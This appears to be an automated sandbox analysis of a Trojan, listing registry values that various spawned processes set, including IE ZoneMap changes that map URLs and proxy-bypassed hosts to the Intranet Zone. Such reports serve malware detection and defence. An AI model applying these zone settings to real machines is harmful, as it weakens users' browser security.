[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process cgjrsnhu.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 A9 9C EF 08 99 F2 48 A1 8C 76 7B 66 DC 49 18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process honmznj1.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 04 D4 27 80 D6 BC FB AF D0 D4 A6 D8 CF A4 DD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD C7 91 0D 9B 30 52 DB A5 CB A2 8A F5 91 34 1C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"FB_1.tmp.exe" = "FB_1.tmp"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"FB_2.tmp.exe" = "IDM Patch 6.23.b.11 Installation"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 93 78 E3 2E 35 92 AD C8 6E 60 7C D7 A5 AE E4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process ping.exe:2120 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 32 27 28 F1 1C B8 92 9D CE 0A 81 48 19 8C 20"
The process ping.exe:268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 03 BB AF 64 24 B2 81 D9 BE E5 9C 5B DF 9F C5"
The process ping.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 A5 AA 68 09 F3 97 F4 88 90 E7 D6 A6 18 B4 7D"
The process ping.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 E1 D9 27 79 54 4F 9E 08 72 07 DE CB 92 D0 C8"
The process ping.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 15 CC F3 36 A7 92 DC 01 4A 7E 55 DF 5B C3 80"
The process ping.exe:2792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 CF 75 53 19 9A CF FF 82 1E 64 C9 47 D4 7F 37"
The process ping.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 43 65 5E 8B DC 28 B7 90 2D 0D FE 7E F3 3A 21"
The process ping.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 CA EB 84 FD 3E B3 C9 D6 0E 78 50 77 AB FB 54"
The process ping.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 FD 29 5C C5 96 F5 0B 47 38 43 56 7F C6 05 91"
The process cvtres.exe:4056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 5D 27 D6 E6 79 B1 DD C6 5A ED 27 57 62 43 E3"
The process cvtres.exe:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 2C C4 E4 9F F9 4A 1A 16 82 7A BF E7 AC 9A 69"
The process cvtres.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 15 22 C5 FA 30 3F 6E 26 19 C0 87 0B AB 69 55"
The process cvtres.exe:3340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 B2 35 43 88 8F 6C 68 7A 91 32 30 83 8E 6C 1B"
The process cvtres.exe:3608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 B7 AF 45 6A BB 1D C8 88 F7 44 CB 0E F9 07 B5"
The process cvtres.exe:2468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 4E CB CA BD BB 0B 4B D5 84 49 75 21 3A 05 07"
The process cvtres.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 0E B3 77 F8 4A 7B 80 A2 62 02 9E 53 5D 60 51"
The process cvtres.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 5A 90 AE 25 FA 48 13 0C 47 90 6F A3 A1 02 4E"
The process system.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A A8 72 84 AD 24 FB 66 96 49 7F ED 5F 49 EA 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"xvnsxkn9.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 70 B0 38 1D CF D4 DE 9D 3E 5A A5 70 4C 59 E8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"bch_h8mn.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC D6 9A 9F 5B 8B 04 CE DB 44 60 34 FA 58 57 77"
The process system.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 05 FF 52 0D E1 19 2D 5D B5 19 4D 35 ED E4 E1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process system.exe:2688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 72 05 6B D5 E7 24 8D CF A7 87 2F 75 2F DD A9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:\375569]
"svchost.exe" = "mIRC"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process system.exe:3312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 61 8E 60 3E 35 78 D3 05 06 8D EB DD 4D BF EE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process system.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 0A 5C 61 A6 A0 A9 49 E6 63 9B 8F 52 5D 0B 7C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"honmznj1.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 2F F3 AF 15 FF EB 30 8D B9 E4 E7 A6 B8 48 52"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"cgjrsnhu.exe" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process qrv670kf.exe:3256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 DC 3F 08 69 F3 F7 3F A8 5A 39 AB 2F F9 04 80"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process qkjdmucq.exe:2752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 61 1F 71 DC 56 1C 2D D8 16 7D 4B 6E E8 AA BE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
